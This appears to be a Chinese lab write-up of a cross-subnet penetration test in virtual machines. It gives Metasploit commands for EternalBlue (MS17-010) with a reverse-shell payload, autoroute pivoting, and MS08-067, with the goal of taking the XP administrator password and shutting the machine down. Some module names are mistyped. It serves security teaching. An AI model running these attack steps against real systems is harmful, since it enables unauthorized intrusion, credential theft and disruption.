Windows网络服务渗透测试实战-跨网段攻击

一、实验项目名称windows网络服务渗透测试实战-跨网段攻击
二、实验目的及要求掌握对跨网段攻击的方法 。
熟悉Metasploit终端的使用方法 。
熟悉通过meterpreter进行后渗透操作
获取winxp系统管理员admin的密码,并使xp系统关机
----基础配置----
1、选择win7

Windows网络服务渗透测试实战-跨网段攻击

文章插图
 

Windows网络服务渗透测试实战-跨网段攻击

文章插图
 

Windows网络服务渗透测试实战-跨网段攻击

文章插图
 

Windows网络服务渗透测试实战-跨网段攻击

文章插图
 
2、选择winXP
Windows网络服务渗透测试实战-跨网段攻击

文章插图
 

Windows网络服务渗透测试实战-跨网段攻击

文章插图
 
3、选择kali
Windows网络服务渗透测试实战-跨网段攻击

文章插图
 

Windows网络服务渗透测试实战-跨网段攻击

文章插图
 
4、查看kali的ip
Windows网络服务渗透测试实战-跨网段攻击

文章插图
 
5、查看winXP的ip
Windows网络服务渗透测试实战-跨网段攻击

文章插图
 
6、查看win7的IP
Windows网络服务渗透测试实战-跨网段攻击

文章插图
 
总结如下:
WinXP
Win7
Kali
【Windows网络服务渗透测试实战-跨网段攻击】网络适配器 桥接模式(自动)
192.168.43.99
网络适配器 桥接模式(自动)
192.168.43.89
网络适配器 NAT
192.168.232.128
网络适配器2 NAT
192.168.232.145
----开始跨网段攻击----
1、输入 msfconsole 启动metasploit
Windows网络服务渗透测试实战-跨网段攻击

文章插图
 
2、使用“永恒之蓝”的漏洞模块,使用扫描命令进行网段内主机扫描
use
auxiliary/scanner/smb/smb_ms17_010 //进入扫描模块
set rhosts (目标网段) //扫描目标网段内的主机
set threads 512 //设置扫描线程
run //执行
Windows网络服务渗透测试实战-跨网段攻击

文章插图
 
3、设置攻击步骤进行攻击
use
exploit/windows/smb/ms17_010_eternalblue //利用攻击模块
set rhost (目标IP) //设置目标IP
set lhost (监听主机IP) //设置监听IP
set payload
windows/x64/meterpreter/reverse_tcp //设置攻击载荷
run
Windows网络服务渗透测试实战-跨网段攻击

文章插图
 
4、通过meterpreter终端获取系统控制台shell,执行ipconfig发现主机存在双网段
Windows网络服务渗透测试实战-跨网段攻击

文章插图
 
5、获取shell权限,在cmd窗口试图下输入 arp -a 可以发现,存在同网段的地址
Windows网络服务渗透测试实战-跨网段攻击

文章插图
 
6、返回meterpreter终端将内网网段192.168.232.128/24添加值路由表
run autoroute -s 192.168.232.128/24
run autoroute -p //查看路由表状况
Windows网络服务渗透测试实战-跨网段攻击

文章插图
 
7.使用 background 退出到msf试图,并搜索 ms08-067 ,此处可以看到内网主机是XP系统,直接使用 ms08- 067 进行攻击
backgroup
search ms08-067
use
exploit/windows/smb/ms08_067.NETapi //利用攻击模块
set payload
windows/meterpreter/bind_tcp //设置攻击载荷
set rhost (目标IP) //设置监听IP
run
Windows网络服务渗透测试实战-跨网段攻击

文章插图
 

Windows网络服务渗透测试实战-跨网段攻击

文章插图
 
8、获取winxp系统管理员admin的密码
Windows网络服务渗透测试实战-跨网段攻击

文章插图
 
9、使xp系统关机
Windows网络服务渗透测试实战-跨网段攻击

文章插图
 

Windows网络服务渗透测试实战-跨网段攻击

文章插图
 

Windows网络服务渗透测试实战-跨网段攻击

文章插图
 
关机之后kali中会失去会话


推荐阅读